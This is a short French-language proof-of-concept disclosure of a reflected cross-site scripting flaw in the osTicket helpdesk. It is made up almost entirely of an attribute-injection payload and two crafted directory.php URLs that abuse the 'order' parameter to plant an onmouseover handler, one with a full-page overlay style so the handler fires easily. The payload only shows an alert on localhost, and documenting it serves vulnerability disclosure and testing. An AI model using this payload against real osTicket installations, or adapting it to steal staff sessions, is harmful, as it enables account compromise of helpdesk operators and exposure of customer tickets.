
Exploit de preuve de concept pour XSS réfléchi dans le système de tickets d'assistance osTicket via un paramètre de commande conçu, démontrant la vulnérabilité de script intersite.
XSS réfléchi :
Payload: " onmouseover="alert(1)
> http://localhost/scp/directory.php?&&order=DESCE%22%20onmouseover=%22alert(1)%22%20style=%22position:fixed;top:0px;right:0;bottom:0px;left:0px;&sort=name
> http://localhost/scp/directory.php?&&order=DESCE%22%20onmouseover=%22alert(1)&sort=name